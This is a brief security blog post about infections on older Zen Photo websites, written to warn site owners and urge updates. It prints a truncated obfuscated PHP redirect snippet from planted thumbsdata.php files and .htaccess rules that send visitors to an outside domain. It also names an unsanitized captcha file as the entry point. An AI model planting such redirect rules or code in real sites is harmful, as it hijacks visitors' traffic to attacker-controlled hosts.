New information on the Zen Photo exploit

While cleaning more websites with Zen Photo installed, we’re finding some new infections.

We’ve been seeing files added called thumbsdata.php. They usually have a string of code like this:

$vf=substr(1,1);foreach(array(10,100,111,99,117,109…{ $l = $_GET[“l”]; } @header(“Location: $l”); exit; }

This is accompanied by an .htaccess file in the same folder with lines similar to this:

ErrorDocument 400 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 401 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 403 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 404 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 500 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}

RewriteEngine On
RewriteRule !thumbsdata.php http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} [R=301,L]

We’ve seen other domains used as well, but this is just an example.

In the log files we’re seeing strings sent to the c.php file in the root of the Zen Photo installation. This file works with captcha, but apparently doesn’t sanitize the data.

Again, this is in older versions of Zen Photo.

Please update your Zen Photo websites immediately.

Post a comment here if you have more information.

If you need assistance in cleaning this up, please call me at (847)728-0214, Skype: wewatchyourwebsite or email me at: traef@wewatchyourwebsite.com

Thank you.